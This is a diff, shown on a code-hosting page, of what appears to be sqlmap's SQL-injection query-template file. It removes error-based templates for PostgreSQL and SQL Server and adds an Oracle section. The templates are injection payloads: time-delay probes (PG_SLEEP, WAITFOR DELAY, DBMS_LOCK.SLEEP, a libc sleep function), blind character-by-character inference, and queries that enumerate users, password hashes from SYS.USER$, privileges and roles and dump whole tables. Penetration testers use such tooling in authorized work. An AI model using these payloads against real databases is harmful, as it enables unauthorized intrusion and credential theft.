||||||
|
|
||||||
<!-- PostgreSQL -->
|
<!-- PostgreSQL -->
|
||||||
<dbms value="PostgreSQL">
|
<dbms value="PostgreSQL">
|
||||||
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
||||||
|
@ -175,7 +96,6 @@
|
||||||
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
||||||
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||||
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
|
|
||||||
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||||
<banner query="SELECT VERSION()"/>
|
<banner query="SELECT VERSION()"/>
|
||||||
<current_user query="SELECT CURRENT_USER"/>
|
<current_user query="SELECT CURRENT_USER"/>
|
||||||
|
@ -242,7 +162,6 @@
|
||||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
|
||||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||||
<banner query="SELECT @@VERSION"/>
|
<banner query="SELECT @@VERSION"/>
|
||||||
<current_user query="SELECT SYSTEM_USER"/>
|
<current_user query="SELECT SYSTEM_USER"/>
|
||||||
|
@ -290,6 +209,83 @@
|
||||||
</search_column>
|
</search_column>
|
||||||
</dbms>
|
</dbms>
|
||||||
|
|
||||||
|
<!-- Oracle -->
|
||||||
|
<dbms value="Oracle">
|
||||||
|
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||||
|
<length query="LENGTH(%s)"/>
|
||||||
|
<isnull query="NVL(%s, ' ')"/>
|
||||||
|
<delimiter query="||"/>
|
||||||
|
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||||
|
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||||
|
<limitgroupstart/>
|
||||||
|
<limitgroupstop/>
|
||||||
|
<limitstring/>
|
||||||
|
<order query="ORDER BY %s ASC"/>
|
||||||
|
<count query="COUNT(%s)"/>
|
||||||
|
<comment query="--"/>
|
||||||
|
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||||
|
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||||
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||||
|
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||||
|
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||||
|
<current_user query="SELECT USER FROM DUAL"/>
|
||||||
|
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||||
|
<!--
|
||||||
|
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||||
|
SELECT USERENV('ISDBA') FROM DUAL
|
||||||
|
-->
|
||||||
|
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||||
|
<users>
|
||||||
|
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
||||||
|
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||||
|
</users>
|
||||||
|
<passwords>
|
||||||
|
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||||
|
</passwords>
|
||||||
|
<!--
|
||||||
|
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||||
|
SELECT * FROM SESSION_PRIVS
|
||||||
|
-->
|
||||||
|
<privileges>
|
||||||
|
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||||
|
</privileges>
|
||||||
|
<!--
|
||||||
|
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||||
|
SELECT * FROM SESSION_ROLES
|
||||||
|
-->
|
||||||
|
<roles>
|
||||||
|
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||||
|
</roles>
|
||||||
|
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||||
|
<dbs/>
|
||||||
|
<tables>
|
||||||
|
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||||
|
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||||
|
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||||
|
</tables>
|
||||||
|
<columns>
|
||||||
|
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||||
|
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||||
|
</columns>
|
||||||
|
<dump_table>
|
||||||
|
<inband query="SELECT %s FROM %s"/>
|
||||||
|
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||||
|
</dump_table>
|
||||||
|
<search_db/>
|
||||||
|
<search_table>
|
||||||
|
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||||
|
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||||
|
</search_table>
|
||||||
|
<search_column>
|
||||||
|
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||||
|
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||||
|
</search_column>
|
||||||
|
</dbms>
|
||||||
|
|
||||||
<!-- SQLite -->
|
<!-- SQLite -->
|
||||||
<dbms value="SQLite">
|
<dbms value="SQLite">
|
||||||
<!-- Not supported on SQLite 2 -->
|
<!-- Not supported on SQLite 2 -->
|
||||||
|
@ -477,7 +473,6 @@
|
||||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
|
||||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||||
<banner query="SELECT @@VERSION"/>
|
<banner query="SELECT @@VERSION"/>
|
||||||
<current_user query="SELECT SUSER_NAME()"/>
|
<current_user query="SELECT SUSER_NAME()"/>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user